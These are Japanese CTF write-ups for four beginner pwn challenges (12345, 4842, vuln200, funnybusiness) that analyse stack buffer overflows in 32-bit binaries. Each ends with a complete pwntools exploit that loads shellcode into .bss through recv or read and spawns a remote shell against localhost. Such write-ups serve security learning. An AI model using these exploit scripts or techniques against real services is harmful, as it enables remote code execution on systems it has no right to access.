下調べ

mattun-mart@4ctf:~/pwn/baby/12345$ file 12345 | sed -e "s/,/\n/g"
12345: ELF 32-bit LSB  executable
 Intel 80386
 version 1 (SYSV)
 dynamically linked (uses shared libs)
 for GNU/Linux 2.6.24
 BuildID[sha1]=09a2a7c2ebaff247534af024496e08f31212a6be
 not stripped

mattun-mart@4ctf:~/pwn/baby/12345$ checksec.sh --file 12345
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Partial RELRO   No canary found   NX disabled   Not an ELF file   No RPATH   No RUNPATH   12345

ubuntu14.04 64bitで動かしてます．
NX，SSPなどが無効．

解析

実行ファイルを起動するとポート12345で接続を待ち受けるのでncコマンドを使って接続．
接続するとクイズが始まる．
クイズに正解するとプログラムは終了し，間違えるともう一度解答することができる．

mattun-mart@4ctf:~/pwn/baby/12345$ nc localhost 12345
WELCOME TO THE CSAW CTF 2012 fill-in-the-damn-blank game

Category: Movies	 **Answers can have spaces & case insensitive**

WarGames: The launch code that Joshua "figures out" for himself
at the end of the movie was ______
Answer: aaaa
WRONG. Try again. Bye.

That's too bad. Try one more time!

Answer: aaa
WRONG. Try again. Bye.
 

いろいろ入力して遊んでいると，再解答時に大量の文字列を送るとプログラムが終了する．

mattun-mart@4ctf:~/pwn/baby/12345$ nc localhost 12345
WELCOME TO THE CSAW CTF 2012 fill-in-the-damn-blank game

Category: Movies	 **Answers can have spaces & case insensitive**

WarGames: The computer that constantly plays wargames codenamed is _____ 
Answer: a                                                            
WRONG. Try again. Bye.

That's too bad. Try one more time!

Answer: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

デバッガで追っていくと，以下のようにEIPが入力で書き変わってしまっていることがわかる．

[----------------------------------registers-----------------------------------]
EAX: 0xffffffff 
EBX: 0xf7fc3000 --> 0x1acda8 
ECX: 0xf7e158fc --> 0x9 ('\t')
EDX: 0xf7fc3000 --> 0x1acda8 
ESI: 0xffffcd84 --> 0x4141 ('AA')
EDI: 0xffffd184 --> 0x1 
EBP: 0x41414141 ('AAAA')
ESP: 0xffffcff0 ('A' <repeats 200 times>...)
EIP: 0x41414141 ('AAAA')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41414141
[------------------------------------stack-------------------------------------]
0000| 0xffffcff0 ('A' <repeats 200 times>...)
0004| 0xffffcff4 ('A' <repeats 200 times>...)
0008| 0xffffcff8 ('A' <repeats 200 times>...)
0012| 0xffffcffc ('A' <repeats 200 times>...)
0016| 0xffffd000 ('A' <repeats 200 times>...)
0020| 0xffffd004 ('A' <repeats 200 times>...)
0024| 0xffffd008 ('A' <repeats 200 times>...)
0028| 0xffffd00c ('A' <repeats 200 times>...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41414141 in ?? ()

なぜEIPが書き変わってしまったかというと次の命令が原因．
EDI(0xffffcfb0)に入力した内容をコピーしているのだが，このアドレスの下にEBP(0xffffcfe8)が存在するため，文字数が多いとEBPを書き換えてしまう．

[----------------------------------registers-----------------------------------]
EAX: 0xffffcfb0 --> 0xf7fc3c20 --> 0xfbad2088 
EBX: 0xf7fc3000 --> 0x1acda8 
ECX: 0x84 
EDX: 0xf7fc3000 --> 0x1acda8 
ESI: 0xffffcbb0 ('A' <repeats 200 times>...)
EDI: 0xffffcfb0 --> 0xf7fc3c20 --> 0xfbad2088 
EBP: 0xffffcfe8 --> 0xffffd008 --> 0xffffd0f8 --> 0xffffd108 --> 0x0 
ESP: 0xffffcb20 --> 0xffffcbb0 ('A' <repeats 200 times>...)
EIP: 0x8048e07 (<q_generate+272>:	rep movs DWORD PTR es:[edi],DWORD PTR ds:[esi])
EFLAGS: 0x207 (CARRY PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048e00 <q_generate+265>:	mov    esi,eax
   0x8048e02 <q_generate+267>:	lea    eax,[ebp-0x38]
   0x8048e05 <q_generate+270>:	mov    edi,eax
=> 0x8048e07 <q_generate+272>:	rep movs DWORD PTR es:[edi],DWORD PTR ds:[esi]
   0x8048e09 <q_generate+274>:	lea    eax,[ebp-0x38]
   0x8048e0c <q_generate+277>:	mov    DWORD PTR [esp],eax
   0x8048e0f <q_generate+280>:	call   0x8048b6e <v>
   0x8048e14 <q_generate+285>:	mov    DWORD PTR [ebp-0xc],eax
[------------------------------------stack-------------------------------------]
0000| 0xffffcb20 --> 0xffffcbb0 ('A' <repeats 200 times>...)
0004| 0xffffcb24 --> 0x213 
0008| 0xffffcb28 --> 0x400 
0012| 0xffffcb2c --> 0x0 
0016| 0xffffcb30 --> 0x0 
0020| 0xffffcb34 --> 0x61 ('a')
0024| 0xffffcb38 --> 0xd78 ('x\r')
0028| 0xffffcb3c --> 0x0 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x08048e07 in q_generate ()

二つのアドレスの差は56なので，60文字以降の入力でリターンアドレスを書き換えられることになる．
これで，自由にEIPを操作できるようになった．

Exploit

NXが無効なので，BSS領域シェルコードを積んでそこに飛んでやることにする．
BSS領域への書き込みはrecv関数を利用する．
以下Exploitコード．

#!/usr/bin/env python
# -*- coding:utf-8 -*-
from pwn import *
import struct

host = 'localhost'
port = 12345

conn = remote(host, port)

bss_addr = 0x804b0a0
elf = ELF('./12345')
recv_addr= elf.plt['recv']

shellcode = asm(shellcraft.dupsh(4))
shellcode += asm(shellcraft.sh())

payload = "A" * 60
payload += p32(recv_addr) 
payload += p32(bss_addr) 
payload += p32(4) 
payload += p32(bss_addr)
payload += p32(len(shellcode))
payload += p32(0) 

conn.recv()
conn.send("\n")
conn.recv()
conn.send(payload)
conn.send(shellcode)
conn.interactive()

結果

mattun-mart@4ctf:~/pwn/baby/12345$ python exploit.py 
[+] Opening connection to localhost on port 12345: Done
[*] '/home/mattun-mart/pwn/baby/12345/12345'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
[*] Switching to interactive mode
$ ls
12345
dump
exploit.py
peda-session-12345.txt

下調べ

mattun-mart@4ctf:~/pwn/baby/4842$ file 4842 | sed -e "s/,/\n/g"
4842: ELF 32-bit LSB  executable
 Intel 80386
 version 1 (SYSV)
 dynamically linked (uses shared libs)
 for GNU/Linux 2.6.24
 BuildID[sha1]=0112d6a8144d6184e2c9ff7d4882c4099f5b8011
 stripped

mattun-mart@4ctf:~/pwn/baby/4842$ checksec.sh --file 4842 
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Partial RELRO   No canary found   NX disabled   Not an ELF file   No RPATH   No RUNPATH   4842

ubuntu14.04 64bitで動かしてます．
NXやSSPが無効．

解析

実行ファイルを動かしてみると，4842ポートで待ち受けていることがわかる．
接続すると中国語のエラーメッセージを吐いて終了する．
解析してみると，どうやらliaotianというユーザが存在しないため終了しているらしい．（pwnlist baby funnybusinessと同じ)
liaotianというユーザを作って再度プログラムを起動，接続すると以下のような文字列が出力され，入力待ちになる．

这部分并不难，但我希望你有乐趣。如果你给我大量的数据，它可能是一件坏事会发生.

中国語を翻訳すると「大量の文字を送ると悪いことが起こる」的なことが書いてあるので大量に文字を送りつけてみるとプログラムが落ちる．

mattun-mart@4ctf:~/pwn/baby/4842$ nc localhost 4842
这部分并不难，但我希望你有乐趣。如果你给我大量的数据，它可能是一件坏事会发生.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
mattun-mart@4ctf:~/pwn/baby/4842$ 

どうやらユーザから受け取った入力でスタックのリターンアドレスを書き換えてしまったらしい．
下記からわかるように，入力文字列を保存する領域の0x146下にリターンアドレスが格納されているため，0x146文字以上の文字列を入力するとリターンアドレスを書き換えてしまう．

[----------------------------------registers-----------------------------------]
EAX: 0x4 
EBX: 0x7ec6 
ECX: 0xf7fd8000 --> 0xe5a1bfe4 
EDX: 0xffffc786 --> 0x0 
ESI: 0x0 
EDI: 0xf7fc3000 --> 0x1acda8 
EBP: 0xffffd738 --> 0x0 
ESP: 0xffffc770 --> 0x4 
EIP: 0x804888c (call   0x8048600 <read@plt>)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048881:	lea    edx,[esp+0x16]            # 入力文字列を保存するスタックアドレス 0xffffc786
   0x8048885:	mov    DWORD PTR [esp+0x4],edx
   0x8048889:	mov    DWORD PTR [esp],eax
=> 0x804888c:	call   0x8048600 <read@plt>      # ユーザからの入力を最大0x800受け取る
   0x8048891:	add    esp,0x15c                 # ret命令を実行するためにESPの位置を操作．0xffffc8ccを指す
   0x8048897:	ret                              # 0xffffc8ccの指すアドレスにリターン
   0x8048898:	sub    esp,0x1c
   0x804889b:	mov    DWORD PTR [esp],0x8048dc3
Guessed arguments:
arg[0]: 0x4 
arg[1]: 0xffffc786 --> 0x0 
arg[2]: 0x800 
[------------------------------------stack-------------------------------------]
0000| 0xffffc770 --> 0x4 
0004| 0xffffc774 --> 0xffffc786 --> 0x0 
0008| 0xffffc778 --> 0x800 
0012| 0xffffc77c --> 0x0 
0016| 0xffffc780 --> 0x0 
0020| 0xffffc784 --> 0x0 
0024| 0xffffc788 --> 0x0 
0028| 0xffffc78c --> 0xf7ffd000 --> 0x20f30 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x0804888c in ?? ()
gdb-peda$ n

EIPを自由に書き換えられるようになったので，あとはExploitを組むだけ．

Exploit

NXが無効なので，bss領域にシェルコードを積んで実行する．
bss領域への書き込みはread関数を利用する
以下，Exploitコード．

#!/usr/bin/env python
# -*- coding:utf-8 -*-
from pwn import *
import struct

host = 'localhost'
port = 4842

conn = remote(host, port)

bss_addr = 0x804b06c
elf = ELF('./4842')
read_addr= elf.plt['read']

shellcode = asm(shellcraft.dupsh(4))
shellcode += asm(shellcraft.sh())

payload = "A" * 326
payload += p32(read_addr) 
payload += p32(bss_addr) 
payload += p32(4) 
payload += p32(bss_addr)
payload += p32(len(shellcode))

conn.recv()
conn.send(payload)
conn.send(shellcode)
conn.interactive()

結果

mattun-mart@4ctf:~/pwn/baby/4842$ python exploit.py 
[+] Opening connection to localhost on port 4842: Done
[*] '/home/mattun-mart/pwn/baby/4842/4842'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
[*] Switching to interactive mode
$ ls -al
total 20
drwxr-xr-x 2 liaotian liaotian 4096 Oct  7 23:01 .
drwxr-xr-x 5 root     root     4096 Oct  7 23:01 ..
-rw-r--r-- 1 liaotian liaotian  220 Oct  7 23:01 .bash_logout
-rw-r--r-- 1 liaotian liaotian 3637 Oct  7 23:01 .bashrc
-rw-r--r-- 1 liaotian liaotian  675 Oct  7 23:01 .profile

かなり簡単．一瞬で終わる．

下調べ

mattun-mart@4ctf:~/pwn/baby/vuln200$ file vuln200 | sed -e "s/,/\n/g"
vuln200: ELF 32-bit LSB  executable
 Intel 80386
 version 1 (SYSV)
 dynamically linked (uses shared libs)
 for GNU/Linux 2.6.24
 BuildID[sha1]=b0adbe78fb249940c782b5118d9bf3f06328a22f
 stripped

mattun-mart@4ctf:~/pwn/baby/vuln200$ checksec.sh --file vuln200 
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Partial RELRO   No canary found   NX disabled   Not an ELF file   No RPATH   No RUNPATH   vuln200

NXやSSPが無効．これもどっかにシェルコード積んでやればよさそう．
ubuntu14.04 64bitで動かしてます．

解析

straceで動かすとポート7777で待ち受けていことがわかる．あと/logs/pwn2logが開けなくて落ちてるので作ってやる．
以下はstraceの一部．

open("./logs/pwn2log", O_WRONLY|O_CREAT|O_APPEND, 0666) = -1 ENOENT (No such file or directory)
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x46} ---
+++ killed by SIGSEGV +++
Segmentation fault

んで接続してみるとCODEGATE 2013 Util serviceが待ってる．
表示されるメニューの文字を入力すると書く方式で入力値を変換してくれる．

mattun-mart@4ctf:~/pwn/baby/vuln200$ nc localhost 7777
CODEGATE 2013 Util service!
[*] md5
[*] help
[*] base64 encode
[*] base64 decode
[*] quit

大量の文字を送ってみたりといろいろ遊んでみるも特にバグらしいものが見当たらない．
しいて言うならば，継続して同じ変換を行う際に前回の入力内容より短い文字を送ると前回の入力内容が残ったまま変換されるので正しく変換できてないことぐらい．
ってことでバイナリを解析していく．

デバッガ起動するとデバッガを検知したというメッセージが表示されるが，メッセージが表示されるだけなので問題ない．
解析していくと次のような流れで動作していた．

1. 入力された内容を受け取る
2. 受け取った文字列がメニューの内容と一致するかチェック
3. 一致したら各変換処理へ移行．間違っていたら再度メニュー表示
4. 変換したい値を受け取り，変換後の値を表示．
5. キーボードから何か入力されるとメニュー画面を表示．1に戻る．

入力文字数は制限されていてスタック領域を破壊するなどの問題はなさそうだった．
んで，どこに問題があるかというと，隠しメニューwrite.

以下のように，メニューで受け取った文字列（hoge）とwriteを比較していた．

[----------------------------------registers-----------------------------------]
EAX: 0x8049c3a ("write")
EBX: 0xffffce9c --> 0x0 
ECX: 0x5 
EDX: 0xffffcfa0 ("hoge\n")
ESI: 0xffffcfa0 ("hoge\n")
EDI: 0x8049c3a ("write")
EBP: 0xffffcf88 --> 0xffffd178 --> 0x0 
ESP: 0xffffcb70 --> 0x0 
EIP: 0x804901f (repz cmps BYTE PTR ds:[esi],BYTE PTR es:[edi])
EFLAGS: 0x200286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8049016:	mov    ecx,0x5
   0x804901b:	mov    esi,edx
   0x804901d:	mov    edi,eax
=> 0x804901f:	repz cmps BYTE PTR ds:[esi],BYTE PTR es:[edi]
   0x8049021:	seta   dl
   0x8049024:	setb   al
   0x8049027:	mov    ecx,edx
   0x8049029:	sub    cl,al

バイナリを追っていくとどうやらwriteはメニューで入力したwrite以降の文字列（以下の例ではhogeshi）を別のスタック領域にコピーするようだ．
このときwrite処理前後のコピー先スタック領域のダンプ結果dump.txtをカレントディレクトリに生成してる．

[*] md5
[*] base64 encode
[*] base64 decode
[*] help
[*] quit
writehogeshi
write running
Copying bytes
DONE
Return to the main

[----------------------------------registers-----------------------------------]
EAX: 0xffffce9c --> 0x0 
EBX: 0xffffce9c --> 0x0 
ECX: 0x9 ('\t')
EDX: 0xffffcfa5 (" hogeshi\n")
ESI: 0xffffcfa5 (" hogeshi\n")
EDI: 0x8049c3f --> 0x46454200 ('')
EBP: 0xffffcf88 --> 0xffffd178 --> 0x0 
ESP: 0xffffcb70 --> 0xffffce9c --> 0x0 
EIP: 0x8049088 (call   0x8048810 <memcpy@plt>)
EFLAGS: 0x200206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x804907d:	mov    DWORD PTR [esp+0x8],ecx
   0x8049081:	mov    DWORD PTR [esp+0x4],edx
   0x8049085:	mov    DWORD PTR [esp],eax
=> 0x8049088:	call   0x8048810 <memcpy@plt>
   0x804908d:	lea    eax,[ebp-0xec]
   0x8049093:	mov    DWORD PTR [esp+0x4],eax
   0x8049097:	mov    DWORD PTR [esp],0x8049c63
   0x804909e:	call   0x80493b1
Guessed arguments:
arg[0]: 0xffffce9c --> 0x0 # 4つ前の命令lea    eax,[ebp-0xec]で指定
arg[1]: 0xffffcfa5 (" hogeshi\n")
arg[2]: 0x9 ('\t')

まぁこの処理コピー先の領域の大きさなんて考えていないのでmemcpyで確保したスタック領域を破壊できる．
具体的にはスタックは下図のようになっているので0xEC+4文字以上入力するとEIPを書き換えることができる．

ちなみに図には書いてないがESP側にはmd5やbase64等の処理の際にユーザが入力する値が格納されてたりする．

Exploit

EIP奪えたので後は好き勝手やるだけ．
今回はNXが無効なので，どっかにシェルコード積んでシェルを起動する．
スタックのアドレスはリークできそうにもないので.bss領域にシェルコードを乗せてやることにする．
.bss領域への書き込みはrecv関数で行う．
ってことでExploitコード．
.bss領域のアドレスはreadelfコマンドで調べた．

#!/usr/bin/env python
# -*- coding:utf-8 -*-
from pwn import *
import struct

host = 'localhost'
port = 7777

conn = remote(host, port)

bss_addr = 0x804b0a0
elf = ELF('./vuln200')
recv_plt_addr = elf.plt['recv']

shellcode = asm(shellcraft.dupsh(4))
shellcode += asm(shellcraft.sh())

ret_addr = p32(recv_plt_addr) + p32(bss_addr) + p32(4) + p32(bss_addr) + p32(len(shellcode)) + p32(0)

payload = "write"
payload += "A" * 240
payload += ret_addr
payload += "\n"

conn.send(payload)
conn.recv()
conn.send(shellcode)
conn.interactive()

結果

mattun-mart@4ctf:~/pwn/baby/vuln200$ python exploit.py 
[+] Opening connection to localhost on port 7777: Done
[*] '/home/mattun-mart/pwn/baby/vuln200/vuln200'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
[*] Switching to interactive mode
$ ls
dump
dump.txt
exploit.py
logs
peda-session-vuln200.txt
vuln200

vuln100のほうが難しかった気がする．
解析さえちゃんとできれば割とすぐ解ける．

下調べ

$ file funnybusiness | sed -e "s/,/\n/g"
funnybusiness: ELF 32-bit LSB  executable
 Intel 80386
 version 1 (SYSV)
 dynamically linked (uses shared libs)
 for GNU/Linux 2.6.24
 BuildID[sha1]=97b05818b1ef9a9383e922e10e1e43ce7a96389e
 stripped

$ checksec.sh --file funnybusiness 
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Partial RELRO   No canary found   NX disabled   Not an ELF file   No RPATH   No RUNPATH   funnybusiness

Ubuntu14.04 64bitで動作させてる．

解析

実行してみると何かを待ち受けている．何だろう．
straceで実行するとポート49681で接続待ち受けしていることがわかった．いわゆるfork-server型の問題．
ncで接続するがfunnybusinessというユーザが存在しないとサーバ側でエラーが吐かれて接続が切れた．

gdb-pedaやobjdumpを駆使してバイナリの中身を追っていくと，文字列funnybusinessを引数に取ってgetpwnam関数が呼ばれていた．
getpwname関数について調べてみる．

getpwnam() 関数は、ユーザ名 name にマッチするパスワード・データベースのエントリを要素毎に分解し、各要素を格納した構造体へのポインタを返す
(パスワード・データベースの例: ローカルのパスワードファイル /etc/passwd,NIS, LDAP)

つまり，先ほどのエラーはOSにfunnybusinessという名前のユーザがいないことが原因のようだ．
OSにfunnybusinessユーザを追加して再度実行.（getpwnameを使っているので管理者権限で実行する必要あり）．

うまく動いたっぽい...が，画面に何も表示されない．
さらにバイナリの中身を追っていくと，次のような動作をすることが分かった．

1. 1回目のrecvでユーザが送るデータのサイズを受け取る
2. 2回目のrecvでそのデータを受け取る
3. 受け取ったデータを引数にとってinflate関数を実行

inflate関数って何だ...
調べた．
zlibライブラリの関数で，圧縮されたデータの解凍に使われる関数みたい．
さっそくてきとうな文字列を圧縮して送ってみる．

#!/usr/bin/env python
# -*- coding:utf-8 -*-
from pwn import *
import struct
import zlib

host = 'localhost'
port = 49681

conn = remote(host, port)

data = "A" * 5000
comp_data = zlib.compress(data)

conn.send(p32(len(comp_data)))
conn.send(comp_data)

お，なんかeipが変なところへ飛んでる．

送ったデータでリターンアドレスが書き変わってるみたい．
これでeipは奪えたので送ったデータのどの部分がリターンアドレスに対応しているか調べる．
ただし，このままだとリターンアドレスに対応する部分がわかっても，データが圧縮されているので自由にリターンアドレスを指定できない．

どうしたものかとpythonのzlibライブラリの圧縮を見ていると，compress関数は第2引数に0を指定すると無圧縮で圧縮できるらしい．
これで生のデータを送れるので，自由にリターンアドレスを書き換えられる．
上記のコードのAの文字数を20，compress関数に引数0を指定して，再度データを送ってみる．（バイナリを解析しているとわかるが送れるサイズには制限がある）

ret命令が実行されるときのスタックを見てみるとespにA*14が積まれている．
送ったデータは20文字のAなので7番目の文字からリターンアドレスになるようだ．
これで自由にリターンアドレスを指定することができるようになったので，Exploitを組み立てればよい．

Exploit

下調べでもわかっているように，このバイナリはNXとPIEが無効になっている．

• NXが無効　 →　.bss領域等でシェルコードが実行できる．
• PIEが無効　→　ASLRが有効でも.bss領域のアドレスは変化しない．(ASLRはheap領域以降のアドレスをランダム化するらしい)

.bss領域にシェルコード置いてしまえばシェルが開ける．
あとはどうやって.bss領域にシェルコードを書きこむかだが，recv関数を利用すればよい．

.bss領域のアドレス調べて

$ readelf -S funnybusiness 
28 個のセクションヘッダ、始点オフセット 0x2190:

セクションヘッダ:
  [番] 名前              タイプ          アドレス Off    サイズ ES Flg Lk Inf Al
  [ 0]                   NULL            00000000 000000 000000 00      0   0  0
  [ 1] .interp           PROGBITS        08048154 000154 000013 00   A  0   0  1
  [ 2] .note.ABI-tag     NOTE            08048168 000168 000020 00   A  0   0  4
  [ 3] .note.gnu.build-i NOTE            08048188 000188 000024 00   A  0   0  4
  [ 4] .gnu.hash         GNU_HASH        080481ac 0001ac 000020 04   A  5   0  4
  [ 5] .dynsym           DYNSYM          080481cc 0001cc 0001d0 10   A  6   1  4
  [ 6] .dynstr           STRTAB          0804839c 00039c 000121 00   A  0   0  1
  [ 7] .gnu.version      VERSYM          080484be 0004be 00003a 02   A  5   0  2
  [ 8] .gnu.version_r    VERNEED         080484f8 0004f8 000030 00   A  6   1  4
  [ 9] .rel.dyn          REL             08048528 000528 000008 08   A  5   0  4
  [10] .rel.plt          REL             08048530 000530 0000d0 08   A  5  12  4
  [11] .init             PROGBITS        08048600 000600 00002e 00  AX  0   0  4
  [12] .plt              PROGBITS        08048630 000630 0001b0 04  AX  0   0 16
  [13] .text             PROGBITS        080487e0 0007e0 00074c 00  AX  0   0 16
  [14] .fini             PROGBITS        08048f2c 000f2c 00001a 00  AX  0   0  4
  [15] .rodata           PROGBITS        08048f48 000f48 0000d3 00   A  0   0  4
  [16] .eh_frame_hdr     PROGBITS        0804901c 00101c 000084 00   A  0   0  4
  [17] .eh_frame         PROGBITS        080490a0 0010a0 0002b8 00   A  0   0  4
  [18] .ctors            PROGBITS        0804af0c 001f0c 000008 00  WA  0   0  4
  [19] .dtors            PROGBITS        0804af14 001f14 000008 00  WA  0   0  4
  [20] .jcr              PROGBITS        0804af1c 001f1c 000004 00  WA  0   0  4
  [21] .dynamic          DYNAMIC         0804af20 001f20 0000d0 08  WA  6   0  4
  [22] .got              PROGBITS        0804aff0 001ff0 000004 04  WA  0   0  4
  [23] .got.plt          PROGBITS        0804aff4 001ff4 000074 04  WA  0   0  4
  [24] .data             PROGBITS        0804b068 002068 000010 00  WA  0   0  4
  [25] .bss              NOBITS          0804b080 002078 004058 00  WA  0   0 32
  [26] .comment          PROGBITS        00000000 002078 00002a 01  MS  0   0  1
  [27] .shstrtab         STRTAB          00000000 0020a2 0000ec 00      0   0  1

Exploitを書く

#!/usr/bin/env python
# -*- coding:utf-8 -*-
from pwn import *
import struct
import zlib

host = 'localhost'
port = 49681

conn = remote(host, port)

bss_addr = 0x804b080
elf = ELF('./funnybusiness')
ret_addr = elf.plt['recv']

shellcode = asm(shellcraft.dupsh(4))
shellcode += asm(shellcraft.sh())

call_recv = p32(ret_addr) + p32(bss_addr) + p32(4) + p32(bss_addr) + p32(len(shellcode)) + p32(0)

payload = "BBBBBB" # ret_addrを7文字目から置くため
payload += call_recv
comp_payload = zlib.compress(payload,0)

conn.send(p32(len(comp_payload)))
conn.send(comp_payload)
conn.send(shellcode)
conn.interactive()

fork-server型なのでシェルコードを送る前に，dup2などを使って自分が使用しているsocketディスクリプタを繋げてあげる必要がある．
これをしないとシェルは奪えても何も表示されない．

実行して無事シェル起動．

mattun-mart@4ctf:~/pwn/baby/funnybusiness$ python exploit.py 
[+] Opening connection to localhost on port 49681: Done
[*] '/home/mattun-mart/pwn/baby/funnybusiness/funnybusiness'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
    FORTIFY:  Enabled
[*] Switching to interactive mode
$ ls -a
.
..
.bash_logout
.bashrc
.profile